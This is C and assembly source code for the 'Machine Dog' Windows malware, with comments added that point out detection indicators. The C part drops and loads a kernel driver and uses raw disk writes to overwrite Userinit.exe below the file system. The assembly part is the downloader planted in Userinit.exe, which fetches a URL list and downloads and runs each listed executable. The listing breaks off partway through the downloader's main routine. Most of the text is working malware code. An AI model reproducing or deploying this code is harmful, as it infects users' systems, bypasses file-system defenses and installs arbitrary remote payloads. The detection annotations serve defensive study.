机器狗源码(C语言的),将病毒体从资源中提取出来写入到第一个分区的指定文件中

// Test.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"

//==============================================================================
#include <pshpack1.h>
// One 16-byte entry of the MBR partition table (byte-packed via pshpack1.h above).
// Only `active`, `PartitionType` and `StartLBA` are read by WriteVirusToDisk.
typedef struct _PARTITION_ENTRY
{
   UCHAR active;                 // boot indicator; 0x80 marks the active (bootable) partition
   UCHAR StartHead;               // CHS start: head
   UCHAR StartSector;             // CHS start: bits 7-6 = cylinder high 2 bits, bits 5-0 = sector
   UCHAR StartCylinder;           // CHS start: cylinder low 8 bits
   UCHAR PartitionType;           // partition type id (see PARTITION_TYPE_* below)
   UCHAR EndHead;                 // CHS end: head
   UCHAR EndSector;               // CHS end: bits 7-6 = cylinder high 2 bits, bits 5-0 = sector
   UCHAR EndCylinder;             // CHS end: cylinder low 8 bits
   ULONG StartLBA;               // first sector of the partition (absolute LBA)
   ULONG TotalSector;             // partition size in sectors
} PARTITION_ENTRY, *PPARTITION_ENTRY;

//==============================================================================
// Layout of the 512-byte Master Boot Record: boot code, four partition entries
// and the trailing signature word. WriteVirusToDisk only uses Partition[0];
// the signature is never validated.
typedef struct _MBR_SECTOR
{
   UCHAR             BootCode[446];
   PARTITION_ENTRY   Partition[4];
   USHORT           Signature;
} MBR_SECTOR, *PMBR_SECTOR;

//==============================================================================
// Leading part of a FAT/NTFS volume boot sector (jump, OEM name, BPB, first
// EBPB field). The structure is deliberately truncated: it only covers the
// fields WriteVirusToDisk needs (SectorsPerCluster, ReservedSectors,
// NumberOfFATs, SectorsPerFAT32).
typedef struct _BBR_SECTOR
{
   USHORT JmpCode;               // 2-byte jump to the boot code
   UCHAR   NopCode;               // 1-byte nop padding so the jump occupies 3 bytes
   UCHAR   OEMName[8];             // 8-byte OEM name

// BPB (BIOS Parameter Block) starts here

USHORT BytesPerSector;         // bytes per sector (512 1024 2048 4096) -- not consulted below, 512 is assumed
   UCHAR   SectorsPerCluster;     // sectors per cluster (1 2 4 8 16 32 64 128); product with BytesPerSector must not exceed 32K
   USHORT ReservedSectors;       // reserved sectors counted from the first sector of the volume; never 0; typically 1 for FAT12/16, 32 for FAT32
   UCHAR   NumberOfFATs;           // number of FAT copies on the volume, normally 2 [NTFS does not use it; must be 0]
   USHORT RootEntries;           // FAT12/16: number of 32-byte root directory entries; FAT32: must be 0 [NTFS does not use it]
   USHORT NumberOfSectors16;     // 16-bit total sector count; may be 0, in which case NumberOfSectors32 must be non-zero; FAT32: must be 0 [FAT32/NTFS do not use it]
   UCHAR   MediaDescriptor;       // media type
   USHORT SectorsPerFAT16;       // sectors occupied by one FAT (FAT12/16); FAT32: must be 0 [FAT32/NTFS do not use it]
   USHORT SectorsPerTrack;       // sectors per track for INT 0x13
   USHORT HeadsPerCylinder;       // heads per cylinder for INT 0x13
   ULONG   HiddenSectors;         // sectors preceding the partition that holds this volume
   ULONG   NumberOfSectors32;     // 32-bit total sector count; FAT32: non-zero; FAT12/16 use it when the volume exceeds 65536 sectors [NTFS does not use it]

// EBPB (Extended BIOS Parameter Block) starts here

ULONG   SectorsPerFAT32;       // FAT32: size of one FAT in sectors (SectorsPerFAT16 must then be 0)
} BBR_SECTOR, *PBBR_SECTOR;

#include <poppack.h>

// MBR partition type ids the infector accepts (checked in WriteVirusToDisk).
#define PARTITION_TYPE_NTFS         0x07
#define PARTITION_TYPE_FAT32         0x0B
#define PARTITION_TYPE_FAT32_LBA     0x0C

//==============================================================================
// Host artifacts this sample touches -- useful as indicators for detection:
//   STR_SYSFILE_PATH   - drop location of the embedded kernel driver (deleted again after loading)
//   STR_VIRFILE_PATH   - system file whose first cluster is overwritten on the raw disk
//   STR_DSKDEVICE_NAME - raw physical disk opened for GENERIC_READ|GENERIC_WRITE
//   STR_HDDDEVICE_NAME - device opened read-only before the infection; presumably
//                        exposed by the dropped driver, but the listing never uses the handle
#define STR_SYSFILE_PATH             TEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#define STR_VIRFILE_PATH             TEXT("%SystemRoot%\\System32\\Userinit.exe")
#define STR_DSKDEVICE_NAME           TEXT("\\\\.\\PhysicalDrive0")
#define STR_HDDDEVICE_NAME           TEXT("\\\\.\\PhysicalHardDisk0")

//==============================================================================
// Private control code sent with DeviceIoControl in WriteVirusToDisk.
// 0xF000 is a vendor-defined device type (the range from 0x8000 up is reserved
// for third parties); function number 0xF01, buffered I/O, no access check.
#define IOCTL_MYDEV_BASE                 0xF000
#define IOCTL_MYDEV_Fun_0xF01           CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)

//==============================================================================
//------------------------------------------------------------------------------
// Stage 1 of the sample: drop and load the helper kernel driver.
//
// Reads resource #1001 (type #1001) out of ModuleHandle, writes it to
// STR_SYSFILE_PATH (%SystemRoot%\system32\drivers\pcihdd.sys), registers that
// file as a demand-start SERVICE_KERNEL_DRIVER named "PciHdd", starts the
// service and then deletes the dropped .sys again. When CreateService fails
// (typically because "PciHdd" already exists) the old service is stopped,
// deleted and created afresh.
//
// Indicators worth alerting on: a short-lived file under system32\drivers,
// CreateService/StartService of a kernel driver named "PciHdd", and
// OpenSCManager(SC_MANAGER_ALL_ACCESS) from a console application.
//
// Returns ERROR_SUCCESS or GetLastError() of the failing call. The return
// value of StartService is not examined, so ERROR_SUCCESS does not prove the
// driver actually loaded.
//------------------------------------------------------------------------------
DWORD InstallAndStartDriver(HMODULE ModuleHandle)
{
   TCHAR           filePath[MAX_PATH];
   HANDLE           fileHandle;
   HRSRC           hSysRes;
   DWORD           dwWritten;
   DWORD           dwSysLen;
   PVOID           lpSysBuf;
   SC_HANDLE       hSCManager;
   SC_HANDLE       hService;
   SERVICE_STATUS   sService;
   DWORD           errCode = ERROR_SUCCESS;
   // Locate the embedded driver image and open the drop path. Short-circuit
   // evaluation stops at the first failing call, whose GetLastError() is kept.
   // sizeof(filePath) is a byte count where a TCHAR count is expected; the
   // listing passes TEXT() strings to CreateFileA, so it is an ANSI build and
   // the two coincide.
   if(
     (NULL == (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001)))
     ||
     (0     == (dwSysLen = SizeofResource(ModuleHandle, hSysRes)))
     ||
     (NULL == (lpSysBuf = LockResource(hSysRes)))
     ||
     (0     == ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath)))
     ||
     (INVALID_HANDLE_VALUE == (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)))
     )
   {
     errCode = GetLastError();
     goto FunExit00;
   }
   // Write the resource bytes to the .sys file; dwWritten is never compared
   // with dwSysLen, only the BOOL results are checked.
   if(
     !WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL)
     ||
     !SetEndOfFile(fileHandle)
     ||
     !FlushFileBuffers(fileHandle)
     )
   {
     errCode = GetLastError();
   }
   CloseHandle(fileHandle);
   if(ERROR_SUCCESS != errCode)
   {
     goto FunExit01;
   }
   if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
   {
     errCode = GetLastError();
     goto FunExit01;
   }
   // First attempt: register the dropped file as kernel-driver service "PciHdd".
   hService = CreateService(
     hSCManager,
     TEXT("PciHdd"),
     TEXT("PciHdd"),
     SERVICE_ALL_ACCESS,
     SERVICE_KERNEL_DRIVER,
     SERVICE_DEMAND_START,
     SERVICE_ERROR_IGNORE,
     filePath,
     NULL,
     NULL,
     NULL,
     NULL,
     NULL
     );
   if(NULL != hService)
   {
     CloseServiceHandle(hService);
   }
   else
   {
     // Creation failed: tear down any existing "PciHdd" service (stop result
     // ignored) and retry the registration once.
     if(NULL != (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
     {
       ControlService(hService, SERVICE_CONTROL_STOP, &sService);
       DeleteService(hService);
       CloseServiceHandle(hService);
     }
     hService = CreateService(
       hSCManager,
       TEXT("PciHdd"),
       TEXT("PciHdd"),
       SERVICE_ALL_ACCESS,
       SERVICE_KERNEL_DRIVER,
       SERVICE_DEMAND_START,
       SERVICE_ERROR_IGNORE,
       filePath,
       NULL,
       NULL,
       NULL,
       NULL,
       NULL
       );
     if(NULL != hService)
     {
       CloseServiceHandle(hService);
     }
     else
     {
       errCode = GetLastError();
       goto FunExit02;
     }
   }
   // Re-open with SERVICE_START only and load the driver. StartService's
   // result is discarded.
   if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_START)))
   {
     errCode = GetLastError();
     goto FunExit02;
   }
   StartService(hService, 0, NULL);
   CloseServiceHandle(hService);
   // Cleanup ladder; the dropped .sys is removed on every path that wrote it,
   // which leaves only the in-memory driver image behind.
FunExit02:
   CloseServiceHandle(hSCManager);
FunExit01:
   DeleteFile(filePath);
FunExit00:
   return errCode;
}

//==============================================================================
//------------------------------------------------------------------------------
// Teardown stage: stop and delete the "PciHdd" kernel-driver service, then
// delete the dropped driver file at STR_SYSFILE_PATH regardless of whether the
// SCM calls succeeded.
//
// Returns ERROR_SUCCESS or GetLastError() of the failing OpenSCManager /
// OpenService call; the results of ControlService and DeleteService are not
// checked.
//------------------------------------------------------------------------------
DWORD StopAndDeleteDriver(VOID)
{
   TCHAR           filePath[MAX_PATH];
   SC_HANDLE       hSCManager;
   SC_HANDLE       hService;
   SERVICE_STATUS   sService;
   DWORD           errCode = ERROR_SUCCESS;
   if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
   {
     errCode = GetLastError();
     goto FunExit00;
   }
   if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
   {
     errCode = GetLastError();
     goto FunExit01;
   }
   // Stop, mark for deletion, release. Nothing here is verified.
   ControlService(hService, SERVICE_CONTROL_STOP, &sService);
   DeleteService(hService);
   CloseServiceHandle(hService);
FunExit01:
   CloseServiceHandle(hSCManager);
FunExit00:
   // The file is normally already gone (InstallAndStartDriver deletes it);
   // this is a second, unconditional attempt.
   ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath));
   DeleteFile(filePath);
   return errCode;
}

//==============================================================================
// 感染硬盘第一个分区的指定的文件
//
// 1)通过FSCTL_GET_RETRIEVAL_POINTERS获取文件数据的分布信息
//
// 2)通过直接访问硬盘(\\\\.\\PhysicalHardDisk0)的MBR和第一个分区的引导扇区得到分区参数来定位文件。
//
// 3)通过对比ReadFile读取的文件数据和自己定位后直接读取所得到的文件数据,确定定位是否正确
//
// 入口参数:
// 要感染的文件名(完整路径)
//
// Return value:
// Success -> NULL
// Failed   -> 指向出错信息的指针
//==============================================================================
//------------------------------------------------------------------------------
// Stage 2 of the sample: overwrite the first cluster of VirusFile on the raw
// disk (the caller passes %SystemRoot%\System32\Userinit.exe).
//
//   1. Ask the file system for the file's cluster map and take the LCN of the
//      first extent.
//   2. Read the MBR and the active partition's boot sector from
//      \\.\PhysicalDrive0 and translate that LCN into an absolute byte offset
//      (FAT32: partition start + reserved sectors + FATs; NTFS: partition
//      start + reserved sectors; 512 bytes/sector assumed throughout).
//   3. Verify the translation by comparing 512 bytes read through the file
//      system with 512 bytes read from the computed raw offset.
//   4. Have the loaded driver fill a cluster-sized buffer via DeviceIoControl
//      (IOCTL_MYDEV_Fun_0xF01) and write that buffer over the file's first
//      cluster with a raw WriteFile on the physical disk, below the file
//      system stack.
//
// Contrary to the comment block above, this returns a DWORD: ERROR_SUCCESS, a
// Win32 error from GetLastError(), or one of the sentinels (ULONG)-1 .. -5
// explained inline below.
//
// FSCTL_GET_RETRI_POINTERS / PRETRI_POINTERS_BUFFER look like the Win32 names
// FSCTL_GET_RETRIEVAL_POINTERS / PRETRIEVAL_POINTERS_BUFFER with the substring
// "eval" stripped, presumably by the publishing site's text filter; the
// listing will not compile as printed.
//
// Detection opportunities: a user-mode process opening \\.\PhysicalDrive0 with
// GENERIC_WRITE, FSCTL_GET_RETRIEVAL_POINTERS issued on Userinit.exe, and a
// sector-level write landing inside Userinit.exe's extents. File-system
// filter drivers do not observe the raw write.
//------------------------------------------------------------------------------
DWORD WriteVirusToDisk(LPCTSTR VirusFile)
{
   STARTING_VCN_INPUT_BUFFER   iVcnBuf;
   UCHAR                       oVcnBuf[272];   // fixed-size output buffer for the retrieval-pointer query
   PRETRI_POINTERS_BUFFER lpVcnBuf;
   DWORD                       dwVcnExtents;
   LARGE_INTEGER               startLcn;
   PUCHAR                     lpClusterBuf;
   DWORD                       dwClusterLen;
   UCHAR                       dataBuf[512];   // first 512 bytes of the file, read through the file system
   UCHAR                       diskBuf[512];   // scratch sector read from the raw disk
   DWORD                       dataLen;
   LARGE_INTEGER               diskPos;
   PPARTITION_ENTRY           lpPartition;
   ULONG                       dwPartitionStart;
   ULONG                       dwPartitionType;
   PBBR_SECTOR                 lpBootSector;
   DWORD                       SectorsPerCluster;
   HANDLE                     hHddDevice;
   HANDLE                     hDskDevice;
   HANDLE                     hVirusFile;
   DWORD                       errCode = ERROR_SUCCESS;
   // Open the device name associated with the dropped driver. The handle is
   // never used again in this function; presumably the open only serves to
   // make sure the driver is present -- not verifiable from this listing.
   if(INVALID_HANDLE_VALUE == (hHddDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)))
   {
     errCode = GetLastError();
     goto FunExit00;
   }
   // Target file: read-only, fully shared, unbuffered (reads bypass the cache).
   if(INVALID_HANDLE_VALUE == (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL)))
   {
     errCode = GetLastError();
     goto FunExit01;
   }
   // Query the cluster map starting at VCN 0.
   iVcnBuf.StartingVcn.QuadPart = 0;
   RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf));
   if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRI_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf[0], sizeof(oVcnBuf), &dataLen, NULL))
   {
     errCode = GetLastError();
     goto FunExit02;
   }
   lpVcnBuf = (PRETRI_POINTERS_BUFFER)&oVcnBuf[0];
   dwVcnExtents = lpVcnBuf->ExtentCount;
   startLcn     = lpVcnBuf->Extents[0].Lcn;   // read before the count check; still inside the zeroed buffer
   if(!dwVcnExtents)
   {
     errCode = (ULONG)(-3); // no extents: file too small (resident data), cannot operate
     goto FunExit02;
   }
   if(startLcn.QuadPart == -1)
   {
     errCode = (ULONG)(-4); // LCN -1: compressed (or otherwise unallocated) extent, cannot locate on disk
     goto FunExit02;
   }
   // Reference copy of the file's first sector, obtained through the file
   // system; compared later against the raw read. Result unchecked.
   ReadFile(hVirusFile, dataBuf, sizeof(dataBuf), &dataLen, NULL);
   // Open the first physical disk for raw read/write.
   if(INVALID_HANDLE_VALUE == (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)))
   {
     errCode = GetLastError();
     goto FunExit02;
   }
   // Read sector 0 (the MBR) and look only at partition entry 0.
   SetFilePointer(hDskDevice, 0, NULL, FILE_BEGIN);
   ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
   lpPartition = &(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
   if(lpPartition[0].active != 0x80)
   {
     errCode = (ULONG)(-1); // first partition is not the active (boot) partition
     goto FunExit03;
   }
   dwPartitionType = lpPartition[0].PartitionType;
   if(
     dwPartitionType != PARTITION_TYPE_FAT32
     &&
     dwPartitionType != PARTITION_TYPE_FAT32_LBA
     &&
     dwPartitionType != PARTITION_TYPE_NTFS
     )
   {
     errCode = (ULONG)(-2); // unsupported partition type
     goto FunExit03;
   }
   dwPartitionStart = lpPartition[0].StartLBA;
   // ULONG * int: the product is formed in 32 bits before widening to QuadPart.
   diskPos.QuadPart = dwPartitionStart * 512;
   // Read the first sector of the active partition (volume boot sector).
   SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
   ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
   lpBootSector = (PBBR_SECTOR)&diskBuf[0];
   SectorsPerCluster = lpBootSector->SectorsPerCluster;   // BytesPerSector is ignored; 512 assumed
   // Compute the sector holding the file's first cluster (FAT32 vs NTFS).
   diskPos.QuadPart = dwPartitionStart;
   diskPos.QuadPart+= lpBootSector->ReservedSectors;
   if(dwPartitionType == PARTITION_TYPE_FAT32 || dwPartitionType == PARTITION_TYPE_FAT32_LBA)
   {
     diskPos.QuadPart+= lpBootSector->NumberOfFATs * lpBootSector->SectorsPerFAT32;   // skip the FAT copies
   }
   diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster;
   diskPos.QuadPart*= 512;   // sectors -> bytes
   // Sanity check: the raw sector at the computed offset must equal the sector
   // read through the file system.
   SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
   ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
   if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf)))
   {
     errCode = (ULONG)(-5); // locating the file on disk failed (mismatch)
     goto FunExit03;
   }
   // One cluster's worth of zeroed buffer for the payload.
   dwClusterLen = SectorsPerCluster*512;
   lpClusterBuf = (PUCHAR)GlobalAlloc(GMEM_ZEROINIT, dwClusterLen); // buffer for exactly one cluster
   if(!lpClusterBuf)
   {
     errCode = GetLastError(); // allocation failed (the original comment here was a copy of the -5 text)
     goto FunExit03;
   }
   // Ask the driver to decode the payload out of the .sys resource section into
   // lpClusterBuf (per the original comment). Notable: the IOCTL is issued on
   // the *file* handle, not on hHddDevice, and the input buffer is a hard-coded
   // address/length -- the author's comments call it "the start / length of
   // this executable's code section, which I don't know how to express in C".
   // That only holds for a fixed image base and build.
   if(!DeviceIoControl(
     hVirusFile,
     IOCTL_MYDEV_Fun_0xF01,
     (PVOID)0x00401000,         // start of this executable's code section (hard-coded)
     0x73E,                     // length of this executable's code section (hard-coded)
     lpClusterBuf,
     dwClusterLen,
     &dataLen,
     NULL
     ))
   {
     errCode = GetLastError();
     goto FunExit04;
   }
   // Raw write of the filled cluster over the file's first cluster, then flush.
   // WriteFile's result and byte count are not checked.
   SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
   WriteFile(hDskDevice, lpClusterBuf, dwClusterLen, &dataLen, NULL);
   FlushFileBuffers(hDskDevice);
   errCode = ERROR_SUCCESS;
   // Cleanup ladder, innermost resource first.
FunExit04:
   GlobalFree(lpClusterBuf);
FunExit03:
   CloseHandle(hDskDevice);
FunExit02:
   CloseHandle(hVirusFile);
FunExit01:
   CloseHandle(hHddDevice);
FunExit00:
   return errCode;
}

//==============================================================================
//------------------------------------------------------------------------------
// Entry point: load the helper driver from this executable's resources,
// overwrite the first cluster of %SystemRoot%\System32\Userinit.exe on the raw
// disk, then stop and remove the driver again. Always returns 0; the result
// of WriteVirusToDisk is discarded. argc/argv are unused.
//
// The MessageBox text (a runtime string, kept as-is) means: "the driver failed
// to load, the program cannot run".
//------------------------------------------------------------------------------
int _tmain(int argc, _TCHAR* argv[])
{
   TCHAR           filePath[MAX_PATH];
   DWORD           errCode;
   // GetModuleHandleA(NULL) is this process's own image, which carries the
   // driver as resource #1001.
   if(ERROR_SUCCESS != (errCode = InstallAndStartDriver(GetModuleHandleA(NULL))))
   {
     MessageBox(NULL, TEXT("驱动程序的加载没有成功,程序将无法运行"), NULL, MB_ICONERROR);
     goto FunExit00;
   }
   ExpandEnvironmentStrings(STR_VIRFILE_PATH, &filePath[0], sizeof(filePath));
   WriteVirusToDisk(filePath);
   StopAndDeleteDriver();
FunExit00:
return 0;
}

//-----------------------------------------------------

汇编代码:

机器狗写入到userinit.exe文件的下载者源码

文章作者:naitm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章备注:从IDA中复制,稍作修改所得。
ASM

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 机器狗写入到userinit.exe文件的恶意代码
; by naitm(http://hi.baidu.com/naitm)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat,stdcall
option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
nThreadCount dd 0                 ; live _DownloadEXERunIt threads; main spins until it reaches 0
g_ThreadCount dd 0                ; declared but not referenced anywhere in this listing
PathName db '.',0                 ; directory handed to GetTempFileName: the current directory
szAgent db 'Shell',0              ; doubles as WinINet user agent and as the Winlogon value name read in main
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0   ; user32 export resolved and called once at start-up
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0   ; opened under HKLM to read "Shell"
szUrlList db 'http://127.0.0.1/cert.cer',0   ; URL of the download list; appears to be a loopback placeholder in this published copy
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------------
; _RunIt(lpExePath): start lpExePath as a new process (passed as the command
; line; no application name; creation flags 20h; inherits the caller's
; STARTUPINFO). The handles in @ProcessInformation are closed only inside
; .if eax == 0, i.e. when CreateProcess failed and the structure was never
; filled; on success both handles stay open. stdcall, one dword argument
; (retn 4). Callers ignore the return value.
;--------------------------------------------------------------------------
_RunIt proc @lpExePath

local @ProcessInformation:PROCESS_INFORMATION
local @StartupInfo:STARTUPINFO

invoke GetStartupInfo,addr @StartupInfo
invoke CreateProcess,0,@lpExePath,0,0,0,20h,0,0,addr @StartupInfo,addr @ProcessInformation
.if eax == 0                                      ; failure branch only
invoke CloseHandle,@ProcessInformation.hThread
invoke CloseHandle,@ProcessInformation.hProcess
.endif

leave
retn 4
_RunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------------
; _DownloadFile(lpURL, lpSaveFile, Buffer): fetch lpURL with WinINet (user
; agent szAgent = 'Shell') and write it to lpSaveFile in 200h-byte chunks.
; Returns in eax the number of chunks written; 0 means nothing was saved.
; @Buffer is forwarded unchanged as the lpBuffer argument of InternetSetOption
; options 2 and 6 (connect / receive timeout). Both callers pass the immediate
; 1388h, so as written the option calls receive 1388h as a pointer; their
; results are not checked, so the download proceeds either way.
; stdcall, three dword arguments (retn 0Ch).
;--------------------------------------------------------------------------
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer

local @hInternet,@hInternetFile,@hLocalFile,@nNumberOfBytesToWrite,@NumberOfBytesWritten,@nWriteCount
local @lpbuffer[200h]:BYTE

xor eax, eax
mov @nWriteCount, eax                              ; chunk counter, also the return value
invoke InternetOpen,addr szAgent,0,0,0,0
.if eax != 0
mov @hInternet, eax
invoke InternetSetOption,@hInternet,2,@Buffer,4   ; option 2 = connect timeout (see header note)
invoke InternetSetOption,@hInternet,6,@Buffer,4   ; option 6 = receive timeout
invoke InternetOpenUrl,@hInternet,@lpURL,0,0,200000h,0
.if eax != 0
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h                   ; size of @lpbuffer for HttpQueryInfo
; 13h = HTTP_QUERY_STATUS_CODE; only the call's success is tested below,
; the status text returned in @lpbuffer is never inspected.
invoke HttpQueryInfo,@hInternetFile,13h,addr @lpbuffer,\
addr @NumberOfBytesWritten,addr @nNumberOfBytesToWrite
.if eax != 0
; 40000000h = GENERIC_WRITE, disposition 4 = OPEN_ALWAYS (existing file is
; overwritten in place and truncated afterwards by SetEndOfFile).
invoke CreateFile,@lpSaveFile,40000000h,0,0,4,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite, 0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)                                 ; read error
.break .if (@nNumberOfBytesToWrite==0)            ; end of stream
inc @nWriteCount
; WriteFile's result is not checked.
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,\
addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax, @nWriteCount                             ; return chunk count (0 = failure)
leave
retn 0Ch

_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------------
; _DownloadEXERunIt(lpURL): thread procedure started by main once per URL in
; the downloaded list. Copies the URL to a local buffer first, because main
; zeroes and reuses its szShellValue buffer for the next line. Creates a
; temp file in the current directory (PathName = '.'), tries _DownloadFile up
; to 3Ch (60) times one second (3E8h ms) apart, and on success launches the
; downloaded file with _RunIt. Decrements nThreadCount on exit (plain dec,
; not an interlocked operation) so main knows when all threads are done.
;--------------------------------------------------------------------------
_DownloadEXERunIt proc @lpURL

local @DownTimes
local @TempFileName[204h]:BYTE
local @TempFileName2[204h]:BYTE
local @szUrl[104h]:BYTE

mov @DownTimes, 3Ch                               ; retry budget: 60 attempts
invoke lstrcpy,addr @szUrl,@lpURL                 ; private copy of the URL (caller's buffer is transient)
; Note: 204 here is decimal while the buffer is 204h bytes; probably a
; transcription slip in this IDA-derived listing.
invoke RtlZeroMemory,addr @TempFileName,204
invoke GetTempFileName,offset PathName,0,0,addr @TempFileName
invoke lstrcpy,addr @TempFileName2,addr @TempFileName   ; backup copy of the temp name

DownloadNxTime:
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
or eax, eax                                       ; 0 chunks written = failure
jz DownloadFailed
invoke lstrcpy,addr @TempFileName,addr @TempFileName2   ; restore the name from the backup, then execute
invoke _RunIt,addr @TempFileName
jmp DownloadEnd
; ---------------------------------------------------------------------------

DownloadFailed:
invoke Sleep,3E8h                                 ; 1 s back-off
dec @DownTimes
jnz DownloadNxTime

DownloadEnd:
dec nThreadCount                                  ; signal completion to main's WetherTreadend loop
leave
retn 4
_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;--------------------------------------------------------------------------
; Entry point of the downloader that is written over Userinit.exe.
;
;  1. Calls user32!LoadRemoteFonts (presumably to mimic part of what the
;     genuine Userinit does at logon -- not verifiable from this listing).
;  2. Reads HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
;     and launches that program, so the user's normal shell still starts.
;  3. Polls InternetGetConnectedState once per second until online.
;  4. Downloads szUrlList to a temp file in the current directory, retrying
;     forever on failure or when the file is shorter than 0Fh bytes.
;  5. Maps the list read-only, splits it into lines (0Ah skipped, 0Dh ends a
;     line, 0 ends the list) and starts one _DownloadEXERunIt thread per
;     non-empty line.
;  6. Waits until nThreadCount drops to 0, then ExitProcess.
;
; Observable behaviour for defenders: a "Userinit" that reads Winlogon\Shell,
; creates GetTempFileName files in its working directory, polls connectivity,
; fetches a URL list over WinINet with user agent 'Shell', and spawns a thread
; per URL that downloads and executes a temp file.
;--------------------------------------------------------------------------
start:
main proc

local hKey,hObject,hFile,lpBaseAddress,ThreadId
local szShellValue[104h]:BYTE

; Step 1: resolve and call LoadRemoteFonts; any failure just skips it.
invoke LoadLibrary,offset szUser32Dll
or eax, eax
jz RegQueryShell
invoke GetProcAddress,eax,offset szLoadRemoteFonts
or eax, eax
jz RegQueryShell
call eax

RegQueryShell:

; Step 2: 80000002h = HKEY_LOCAL_MACHINE, 20019h = KEY_READ. ThreadId is
; reused here as the in/out cbData (104h) for RegQueryValueEx.
invoke RegOpenKeyEx,80000002h,offset szSubKey,0,20019h,addr hKey
or eax, eax
jnz TestInternet
mov ThreadId, 104h
invoke RtlZeroMemory,addr szShellValue,104h
invoke RegQueryValueEx,hKey,offset szAgent,0,0,addr szShellValue,addr ThreadId   ; value name 'Shell'
invoke _RunIt,addr szShellValue                   ; start the configured shell
invoke RegCloseKey,hKey

TestInternet:

; Step 3: wait for connectivity, checking every 1 s. ThreadId is scratch
